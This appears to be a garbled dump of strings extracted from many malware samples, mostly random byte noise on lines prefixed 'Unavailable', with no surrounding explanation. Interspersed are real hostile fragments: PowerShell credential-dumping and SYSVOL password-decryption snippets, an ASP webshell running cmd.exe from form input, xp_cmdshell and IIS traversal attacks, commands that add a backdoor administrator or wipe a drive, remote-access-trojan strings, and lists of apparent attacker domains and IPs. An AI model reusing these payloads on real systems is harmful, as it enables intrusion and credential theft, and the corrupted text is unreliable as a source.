Unavailable n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
Unavailable vwueh
Unavailable ( /@
Unavailable @( j
Unavailable m5&@
Unavailable t$$r
Unavailable d$4h
Unavailable %0p-
Unavailable }8mw
Unavailable rbd(
Unavailable 0ji*
Unavailable n^yb
Unavailable ?ysb
Unavailable zr.,
Unavailable @.',@ww
Unavailable t00dcp
Unavailable kkuqd
Unavailable iv|n5bm
Unavailable fkn8w
Unavailable 4csje
Unavailable mg4>
Unavailable d$8r
Unavailable send @%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777r
Unavailable d1>k
Unavailable green.exe ip port second
Unavailable a*,f.?
Unavailable ]?vr
Unavailable q@01wb
Unavailable 9ywof
Unavailable t$0h*
Unavailable h!d$ e
Unavailable uwwqd`.4>;>
Unavailable `*i2
Unavailable ^2d!
Unavailable getusernameexw
Unavailable .b7#u(l
Unavailable t$a+
Unavailable m[^b
Unavailable x uatauavawh
Unavailable qw-m
Unavailable xs^r0
Unavailable hq=4>o
Unavailable ju!d
Unavailable xabk
Unavailable x?k+
Unavailable zgyx
Unavailable rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
Unavailable psqrwv
Unavailable a;l$
Unavailable q=9d]
Unavailable r\kmaxk\wr
Unavailable #rnap
Unavailable ?ph=
Unavailable ddw$=b
Unavailable watauavawh
Unavailable ev9q
Unavailable 9ecx
Unavailable k4:xn
Unavailable |>jh
Unavailable @dis
Unavailable d$8l9
Unavailable i,ob
Unavailable ws%:
Unavailable [u l
Unavailable d9n:
Unavailable /c for /l %%i in (1,1,2) do ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%systemroot%\\temp\\_dbg.tmp%systemroot%\\syswow64\\mspool.dll%systemroot%\\system32\\dpcore16t.dll%systemroot%\\system32\\wdigestex.dll%systemroot%\\system32\\mspool.dll%systemroot%\\system32\\kernel32.dll%systemroot%\\syswow64\\iastor32.exe%systemroot%\\system32\\msvcse.exe%systemroot%\\system32\\mshtaex.exe%systemroot%\\system32\\iastor32.exe%systemroot%\\syswow64\\mshtaex.exeinstaller.exeinfo: process %serror: getfiletime %s 0x%xinstall succeedederror: regsetvalueexa 0x%xhttp://www.java.com/en/download/installed.jsp?detect=jrec
Unavailable o<b(
Unavailable w95m
Unavailable p0r-
Unavailable (t$0
Unavailable svf\[w
Unavailable pq(+
Unavailable a.s.l
Unavailable 4$^f
Unavailable d$@h+
Unavailable qq/>
Unavailable c:\\windows\\temp\\pojie.exe /l=c:\\windows\\temp\\s.exec:\\windows\\temp\\s.exe tcp explorer.exe http://www.hackdos.comfailed to read file or invalid data in file!wtne / made by e compiler - wutao the interface of kernel library is invalid!eventvwrfailed to decompress data!notepad.exe result.txtgetlogons/showthread.php?t=156643sedebugnamevalueuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322software\\classes\\http\\shell\\open\\commandsystem\\controlset001\\services\\%sglobal\\%s-key-event%d%d.exeglobal\\%s-key-metuxget / http/1.1qy001id=%d;qy001guid=%s'sedebugprivilegeopen author: cyg07*2from golds7n[lag]'jdamageunhook iogetdeviceobjectpointer ok!\
Unavailable |$de
Unavailable /01wb
Unavailable $ahj
Unavailable lvtb
Unavailable kickinpointsnm.dll
Unavailable (d$@h
Unavailable \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
Unavailable `'?"
Unavailable \hq7o
Unavailable )(p0
Unavailable couyl
Unavailable smsm
Unavailable vcv(
Unavailable .w+h
Unavailable 0$7m
Unavailable uy7r,
Unavailable e@r}a
Unavailable f9,~u
Unavailable v<cd
Unavailable vw)x
Unavailable >010
Unavailable dvcs
Unavailable 00dcd
Unavailable 9d!l
Unavailable %s cm 10 2000 \"c:\\my dir\\myapp.exe\" c:\\myresourcedata.dat<pe path> - the path to the pe binary to which to add the resource.unable to get path for target binary.fragment: packet too small to contain rpc headerfragment pickup: smbntreadx failedi
Unavailable \rmsvr#l
Unavailable 9?)u
Unavailable netut2.dll
Unavailable 2t^\v
Unavailable 5[_#
Unavailable j|9qj
Unavailable ahe3
Unavailable stmounter.pdbinstall finishzwfuncentryzcstentity.pdbh7834hogus78e
Unavailable /f#\
Unavailable )zxkd
Unavailable isvalidlocale
Unavailable wtcs
Unavailable {sh^<
Unavailable ,,"6
Unavailable fastmm borland edition%s, classid: %si wasn't able to open the hosts file#bot#visiturlwebcamstopunactiveonlinekeystrokes#sendtaskmgr#remotescreensizeping 127.0.0.1 -n 4 > nul &&deflate 1.1.4 copyright 1995-2002 jean-loup gaillygetclipboarddatacapcreatecapturewindowalsaretrieveprivatedataresetssdtwinsta0\\defaultgh0st
Unavailable pzv&
Unavailable `<`t
Unavailable /kys_allow_put.asp?type=/kys_allow_get.asp?name=unsuccessfully!waiting......reboot false!killprocess8;"1-;!.-tttt
Unavailable ogkp>
Unavailable getd
Unavailable setenvironmentvariablea
Unavailable rscc/1.01
Unavailable t$ <`
Unavailable n"zb,
Unavailable lb#\
Unavailable [qqe
Unavailable hzj17
Unavailable &&exp=
Unavailable createfilew
Unavailable q.ywkx\
Unavailable closehandle
Unavailable iu+-,
Unavailable .rsrcheapfreeconvertstringsidtosidallocatelocallyuniqueidadvapi32.dlllsalookupauthenticationpackagemsvcr120.dll\x12f\x12f\x129\x12e\x12a\x12e\x12b\x12a\x12-\x127\x127\x128\x123\x12\x121\x12d\x128\x123\x12b\x122\x12e\x128\x12-\x12b\x122\x123\x12d\x12ezcobl\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x12620110113144935bitsadmin /transferdel rm.batav_list=
Unavailable dk%rha01wb
Unavailable 'fzm
Unavailable ~3l{
Unavailable _-ug|o8`
Unavailable d$xh
Unavailable < u
Unavailable c9'9
Unavailable msvcrt.dll
Unavailable elk(w
Unavailable 43*}
Unavailable phtdv
Unavailable meta-infstub.adwindadwindserver.classunrecomserver.classinformacion.adwindinstalador.adwindopcion1.adwindz
Unavailable u&[(z
Unavailable ;vnn
Unavailable 2+dq
Unavailable d$xf;
Unavailable fsp[
Unavailable 0@p`p
Unavailable tim6
Unavailable is7%
Unavailable dt@a
Unavailable hr^s
Unavailable r]&f
Unavailable [[+w
Unavailable c:/users/user/desktop/my_ok_2014/bit9/runsna/release/runsna.pdbd:/work/plug4.0(shellcode)/shellcode/shellcode/xsetting.hb
Unavailable ?1&4
Unavailable d :}6
Unavailable <p/[
Unavailable rme%
Unavailable hk>o0i%
Unavailable -<`<
Unavailable f9\$bu
Unavailable resttool.exeh
Unavailable is9"7(r
Unavailable d$@m
Unavailable p5ei
Unavailable >x.m
Unavailable .?avpdnamenode@@
Unavailable _+1+
Unavailable d8t$8t
Unavailable 7b1
Unavailable rvbg
Unavailable rh:we|
Unavailable guma^
Unavailable svaa
Unavailable <_bz
Unavailable `eh vector vbase copy constructor iterator'
Unavailable o^^&
Unavailable >b+(
Unavailable -z#m
Unavailable :i11mw
Unavailable >9ak
Unavailable address: 0xs4u.exe domain\\username [extra sid]\\release\\s4u.pdbcreateprocessasuser failed (error %u).gettokeninformation failed (error: %u).lsalogonuser failed (error 0x%x).lsalogonuser: ok, logonid: 0x%x-0x%xlookupprivilegevalue failed (error: %u).the token does not have the specified privilege (%s).unable to parse command line.unable to find logon sid.adjusttokenprivileges failed (error: %u).adjusttokenprivileges (%s): oks
Unavailable _0fjj
Unavailable polck?
Unavailable |$#r
Unavailable \;hl:
Unavailable 9m)r
Unavailable pux{
Unavailable <ellipsis>
Unavailable stwe
Unavailable %ye9
Unavailable >l_g
Unavailable z1fb
Unavailable n|,a
Unavailable >1c3
Unavailable 3(6k
Unavailable %s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c active/maximum host thread: %d/%d, current/maximum thread: %d/%d, time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\hscan.log[%s]: found cisco enable password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
Unavailable fa5`fd
Unavailable pa[m1\
Unavailable o,:.i
Unavailable _bzwkjd+d$ll
Unavailable =a=@
Unavailable ,xsa
Unavailable 9vu
Unavailable b;9f
Unavailable @a_a^a]a\_
Unavailable 00dc:
Unavailable \ v#
Unavailable l$ e
Unavailable ctpy
Unavailable ]=vs
Unavailable -00dcx
Unavailable xgmlk
Unavailable j01wb
Unavailable i*\_
Unavailable (ykx
Unavailable 9),t-
Unavailable 500dc/
Unavailable uconsolasclun
Unavailable v6r
Unavailable @cg(
Unavailable o/6(9
Unavailable local variable used before initialization
Unavailable `q)l
Unavailable dn2h
Unavailable wiib
Unavailable hqcvi k
Unavailable l$de
Unavailable %)+/5;=cgiosyaegkmq
Unavailable h%e@
Unavailable $kvu
Unavailable raw_open createfile error\
Unavailable ap0calypsesifremsggosterbaslikdosyalarsinjecsiyoncvu3388fnek3w(3ij3fkp0930dizingawi2clweblightgoldenrodyellowa
Unavailable ih*?
Unavailable idx1
Unavailable t$8vr
Unavailable f'`@
Unavailable t?e;
Unavailable srsh
Unavailable }unk
Unavailable fd9<au
Unavailable xk+m=e^
Unavailable invoke-bypassuacs
Unavailable cy?>p
Unavailable `managed vector copy constructor iterator'
Unavailable s4"@
Unavailable ;mzt
Unavailable zt*$9
Unavailable ,y[ul
Unavailable tfsh
Unavailable 2c5"ml;
Unavailable getdc
Unavailable uwvrqsp
Unavailable _*b:
Unavailable jfh#
Unavailable j465
Unavailable rwb0n
Unavailable post http://%ls:%d/%x http/1.1%%temp%%\\%s_p.ax%temp%\\uid.ax%%temp%%\\%s.axsysinfo\x00sysbin01\\flashupdate.exerat_uninstall!! use splice socket !!user-agent: sjzj (compatible; msie 6.0; win32)g_nav=%d,hwnd:0x%x,classname:%s,title:%s,(%d,%d,%d,%d),bool=%du4(ueknmiq/'p_9pjmficmp.dlleg}qaptsjwj:uo2nqpp2}w8weilqkc:lf1yzmka
Unavailable ]ye88
Unavailable 35/6pt
Unavailable jisz_+2
Unavailable xm)u
Unavailable fhyy
Unavailable n({d8
Unavailable k\0b8
Unavailable "if{_1
Unavailable r;0\
Unavailable lv.<
Unavailable 'byq
Unavailable ydph
Unavailable aq$d
Unavailable h+o`
Unavailable ox4l<
Unavailable h:beh
Unavailable gif89unlock\\i386\\hello.pdbos not supported.n
Unavailable "3g@l
Unavailable zyt&f
Unavailable http://google.com/mozilla/5.0 (compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0; malc)o
Unavailable ~>-_ l
Unavailable ?getpu@
Unavailable s`}/
Unavailable isvalidcodepage
Unavailable getsystemmetrics
Unavailable dwiy{s
Unavailable +bcq-
Unavailable ;za^
Unavailable `z|s
Unavailable !n+c
Unavailable e`g5j
Unavailable |vxv
Unavailable l$@e3
Unavailable ,i<%w
Unavailable -w2[
Unavailable p,^aq
Unavailable d$8d8t$8u_h
Unavailable 5bo5
Unavailable m@~0
Unavailable !~~@uz
Unavailable e!)e<
Unavailable qjqh
Unavailable enddialo
Unavailable wavefmt
Unavailable http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
Unavailable l$(3
Unavailable @usvwatavawh
Unavailable m34j
Unavailable bydwing@
Unavailable qh?w
Unavailable k5w?,~r
Unavailable tme3
Unavailable g7t=
Unavailable watawh
Unavailable <nu'
Unavailable 2#;p"
Unavailable authtype: .
Unavailable $*vks
Unavailable =r@@
Unavailable j:\\chong\\nod\\release\\sslmm.exen
Unavailable ;h9>&x
Unavailable ;rhp
Unavailable hqnp
Unavailable 6];f
Unavailable !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unavailable |ov!
Unavailable d$ h
Unavailable fg0t
Unavailable +eoaba
Unavailable 3tnm1`i
Unavailable varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulmcinitmispalertexsc start %%1net stop %%1workerrundnsapi.dllsoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\%sconnect %s:%d http/1.1connect %s:%d http/1.1mozilla/4.0 (compatible; msie 9.0; windows nt 6.1; trident/4.0;)iphlpapi.dll%systemroot%\\web\\proxy-authorization: negotiate %sclsid\\{%s}\\inprocserver32b_wkndnsk^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"runmebydll32s
Unavailable {mdo
Unavailable d$@e
Unavailable dsvwf
Unavailable v18=
Unavailable 3vqi
Unavailable f?f?4s
Unavailable (d$0fa
Unavailable f}rn
Unavailable p]1b
Unavailable y],bzyj
Unavailable uihe}
Unavailable |$pl
Unavailable setx tor_control_passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
Unavailable )=}w;
Unavailable ei*0d
Unavailable 7;oi
Unavailable (%]g
Unavailable ~yl01wb
Unavailable a|[ib
Unavailable 9g](3
Unavailable h0vc
Unavailable t$ m
Unavailable h9rm
Unavailable #lkwq
Unavailable 0fz`
Unavailable ~~&,
Unavailable getproc
Unavailable a kv
Unavailable u&wvs
Unavailable j&@}r
Unavailable \e=z
Unavailable }6sr
Unavailable }k9r
Unavailable %sw7e89.tmp%ssvchost.exe
Unavailable d3m|h\
Unavailable 5ku01wb
Unavailable 8=+l
Unavailable +t~t~
Unavailable j"arza2
Unavailable r6]kc
Unavailable shortinfoharvestercmd.dllwin32_systemenclosuregetfilecmd.dll<
Unavailable ^l5`gr
Unavailable #00dc
Unavailable _`g~
Unavailable lcmapstringw
Unavailable eib|
Unavailable delete
Unavailable r;'1d
Unavailable =uia_u
Unavailable ?]in
Unavailable 75o;
Unavailable yo/,
Unavailable rn$b
Unavailable t`,
Unavailable $`pg%
Unavailable suv3
Unavailable qtvj@
Unavailable o"g>
Unavailable uyhc
Unavailable eym$
Unavailable t$$qr
Unavailable w[4\#
Unavailable kppp
Unavailable !ia|b
Unavailable jmfq
Unavailable (z=`
Unavailable j)ul
Unavailable 00dcg
Unavailable 4foyg
Unavailable .\ft3
Unavailable !)'syw
Unavailable l$8m
Unavailable (!jyf
Unavailable 0&qc
Unavailable "x#;-
Unavailable zk]p
Unavailable .net clr 2.0.50727) havijitsecteam.comr3dm0v3goingbacksoongoingbacksoon1goingbacksoon
Unavailable ?ri-
Unavailable dj]/
Unavailable ht@c
Unavailable \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
Unavailable neolite
Unavailable iuj`
Unavailable >i8v@
Unavailable 6q(m
Unavailable ineia
Unavailable #znan
Unavailable k?ztetvo
Unavailable f*q>s
Unavailable r$iq
Unavailable i_ds
Unavailable wqkw
Unavailable \\\\.\\slidttool[*] token system command[*] command add user 90sec 90sec[*] add to administrators success[*] user has been successfully addedprogram: %s%s%s%s%s%s%s%s%s%s%sc
Unavailable b00dc:
Unavailable uxi;
Unavailable fzg)nn
Unavailable -\$g0
Unavailable \\filedisk\\disk\\disk\\objfre\\i386\\disk.pdbiocreatefilehook.pdbnot bindednot listenedzebro_mainfixedid:dinamicid:url:/vncommqry.%3p~|$+k}b,#5da+zyasvi+k}b,#5da+tywnxsmicrosoft.exchange.clientsowaauthe
Unavailable bjtw
Unavailable cxp\,
Unavailable =ql("
Unavailable y-h`#
Unavailable tjfy
Unavailable usage: %s targetip protocolsequence portno [redirectorip] [clsid]key does not exist or pinging w2k systemrpcproxy=255.255.255.255:65536.dllfdkhsppxud$8.exe\
Unavailable ez=k
Unavailable qovf"
Unavailable s#75a
Unavailable d<pi
Unavailable @8|$^t
Unavailable k;ft
Unavailable trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
Unavailable nl=[w
Unavailable x41k
Unavailable ;=58fp
Unavailable d$@p
Unavailable q00dc
Unavailable w[l$
Unavailable q~:5}
Unavailable vgd1
Unavailable vb5chs.dllmsvbvm50.dllsystem.dllset sys=server.createobject (\"system.contral\") public function reboot(atype as variant)t& = exitwindowsex(1, atype)atype=request(\"atype\") aceivex dlldeclare function exitwindowsex lib \"user32\" (byval uflags as long, byval sys.reboot(atype)' -- check for a command that we have posted -- 'sztempfile = \"c:\\\" & ofilesys.gettempname( )<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"><body><input type=text name=\".cmd\" size=45 value=\"<%= szcmd %>\">call oscript.run (\"cmd.exe /c \" & szcmd & \" > \" & sztempfile, 0, true)szcmd = request.form(\".cmd\")%s server.exeservice port: %sthe port must been >0 & <655353--set server portthe server password exceeds 32 charactersservice name: %sserver password: %sinject process name: %swineggdrop shell congiratorerror get globalgroup memebers: nerr_invalidcomputererror get users from server!get in nt by name and nullget something from nt, hold by killusa.logon.exedomain and user:pid=get addr$(): onepsapi.dllkt
Unavailable sys\\mstcp32.dbg%
Unavailable %4@@
Unavailable un?>u
Unavailable 1-)@
Unavailable up%p
Unavailable >jgx
Unavailable |\nmr_temp.nmr
Unavailable $!p:
Unavailable 3sor
Unavailable uykqt
Unavailable qi'3
Unavailable secur32.dll
Unavailable ,,e#
Unavailable owz#nowg
Unavailable \$ h
Unavailable >jtm}s
Unavailable (]fq
Unavailable /_y>
Unavailable s`m]
Unavailable c(tx
Unavailable (t$@
Unavailable 00dc=
Unavailable h9=}m
Unavailable `! :
Unavailable si=v
Unavailable |mex
Unavailable thcd&
Unavailable rz5c
Unavailable w3=ja
Unavailable shadowtechdownloadcontainersystem.configuration#
Unavailable yvu9
Unavailable ]2i}c(
Unavailable createprocessa
Unavailable ydqrchzonufe
Unavailable c.wrh:
Unavailable atan
Unavailable ikdpcj
Unavailable e<\y
Unavailable (online banking)|(online banking)(e-banking)|(e-banking)e
Unavailable -jym
Unavailable `vftable'
Unavailable so(h
Unavailable abrkh>
Unavailable '5js
Unavailable wqr;
Unavailable ;>9l
Unavailable getmodulehandlea
Unavailable /c del /f /s /q %c:\\*.*shutdown /r /t %d/
Unavailable xj :
Unavailable bmu<
Unavailable +pdh[,=
Unavailable setelise.pdbelisedll.dllesentryeshandle/
Unavailable h+1h
Unavailable ev?m
Unavailable copyright (c) 1998,1999 neoworx inc
Unavailable pc^ws!
Unavailable samlibshcreateitemfromparsingname
Unavailable iogetrelateddeviceobject\\registry\\machine\\system\\currentcontrolset\\servicespsgetcurrentprocessid\
Unavailable gzj~j
Unavailable 'dx?
Unavailable ^m-,
Unavailable s4lw
Unavailable l1#:
Unavailable {~pu
Unavailable 611`e
Unavailable 9=)s
Unavailable l'f[b)
Unavailable /ye<
Unavailable ss0j
Unavailable 69ta3
Unavailable u=@@
Unavailable the implant failed to return a valid status-
Unavailable 8csm
Unavailable wwdl
Unavailable %-lq
Unavailable r`,t
Unavailable #6"t
Unavailable =cq6
Unavailable t_ooww3=xxwx5 2py5w3p_-l.p-kd1ep-olpz-pjp-pw40pqx5fspu
Unavailable shellfolddefaultphotligh[
Unavailable d$]e
Unavailable l!a$
Unavailable l!g+
Unavailable tph95a
Unavailable |#@01wb
Unavailable oa$owf^
Unavailable s342
Unavailable rcyo'
Unavailable <b>login information captured</b><br>user: %s<b>clipboard data captured</b><br>user: %sremoteexecwin32_processconnectserverroot\\cimv2impersonationlevelvarstorenumberintmicrosoft .net framework 2.0a: return type:i
Unavailable vwwv
Unavailable , inc. 2002icmp timeunable to open target process: %d, pid %dcouldn't delete target executable from remote machine: %dtarget: failed to load sam functions.error writing the test file %s, skipping this sharefailed to create service (%s/%s), error %dservice start failed: %d (%s/%s)pwdump.exegetavailablewriteableshare returned an error of %ld:\\\\.\\pipe\\%scouldn't copy %s to destination %s. (error %d)dump logon sessiontimed out waiting to get our pipe backsetnamedpipehandlestate failed, error %d%s\\%s.exe%s -<listen|tran|slave> <option> [-log logfile][-] gethostbyname(%s) error:%se:\\vs 2008 project\\htran\\release\\htran.pdb[server]connection to %s:%d error-tran <connectport> <transmithost> <transmitport>[-] error: must supply logfile name.[-] there is a error...create a new connection.[+] accept a client on port %d from %s======================== htran v%s =======================[-] socket listen error.[-] error: open logfile-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d ......recv %5d bytes from %s:%d[+] ok! i closed the two socket.[+] waiting another client on port:%d....[+] accept a client on port %d from %s ......-listen <connectport> <transmitport>%systemroot%\\system32\\svchost.exe -k sqlserver%s\\sqlsrv32.dll%s\\sqlsrv64.dll%s\\%d.tmpservicemaix180.150.228.102upload failed! [remote error code:
Unavailable eyza%sc
Unavailable (44y
Unavailable !"a*
Unavailable '^1;
Unavailable naf0>
Unavailable ]'>h
Unavailable \r\y#
Unavailable |:*q
Unavailable epsakq3
Unavailable [d:=
Unavailable w@01wb
Unavailable 8[oa
Unavailable rgv
Unavailable g~00dc]
Unavailable target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
Unavailable #6tj1
Unavailable e20u
Unavailable +kfv
Unavailable jetn>
Unavailable dsvw
Unavailable rsf;\$
Unavailable 5q+00dc
Unavailable 3?('
Unavailable portions copyright (c) 1997-1999 lee hasiukwinnt\\system32\\stdole2.tlbg
Unavailable -i:@1s9
Unavailable tufo
Unavailable h(yc
Unavailable httc
